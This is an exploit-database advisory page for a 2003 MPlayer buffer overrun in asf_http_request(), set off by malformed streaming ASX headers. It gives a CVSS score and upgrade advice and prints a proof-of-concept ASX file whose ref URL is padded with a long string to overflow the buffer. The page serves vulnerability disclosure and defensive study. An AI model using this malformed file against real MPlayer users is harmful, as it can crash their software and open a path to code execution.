header-logo
Suggest Exploit
vendor:
MPlayer
by:
SecurityFocus
7,5
CVSS
HIGH
Buffer Overrun
120
CWE
Product Name: MPlayer
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2003

Buffer Overrun in MPlayer when Handling Malformed Streaming ASX File Headers

A vulnerability has been discovered in MPLayer when handling malformed streaming ASX file headers. The problem occurs due to insufficient bounds checking performed within asf_http_request(). It has been demonstrated that it is possible for a remote attacker to provide a malicious streaming ASX file that will overrun the bounds of a reserved buffer, when a vulnerable version of MPlayer is used to interpret the file. Remote arbitrary code execution has been confirmed possible.

Mitigation:

Upgrade to the latest version of MPlayer.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8702/info

A vulnerability has been discovered in MPLayer when handling malformed streaming ASX file headers. The problem occurs due to insufficient bounds checking performed within asf_http_request(). It has been demonstrated that it is possible for a remote attacker to provide a malicious streaming ASX file that will overrun the bounds of a reserved buffer, when a vulnerable version of MPlayer is used to interpret the file. Remote arbitrary code execution has been confirmed possible.

 <asx version = "3.0">
 <title>Bas Site ASX</title>

 <moreinfo href = "mailto:info@badsite.com
 <mailto:info@badsite.com> " />
 <logo href = "http://www.badsite.com/streaming/grupo.gif
 <http://www.badsite.com/streaming/grupo.gif> " style="ICON" />
 <banner href= "images/bannermitre.gif">
 <abstract>Bad Site live</abstract>
 <moreinfo target="_blank" href = "http://www.badsite.com/
 <http://www.badsite.com/> " />
 </banner>

 <entry>
 <title>NEWS</title>
 <AUTHOR>NEWS</AUTHOR>
 <COPYRIGHT>� All by the news</COPYRIGHT>
 <ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa"/>
 <logo href = "http://www.badsite.com/streaming/grupo.gif
 <http://badsite.com/streaming/grupo.gif> " style="ICON" />
 </entry>
 </asx>

Navigation

Suggest Exploit

Services By CQR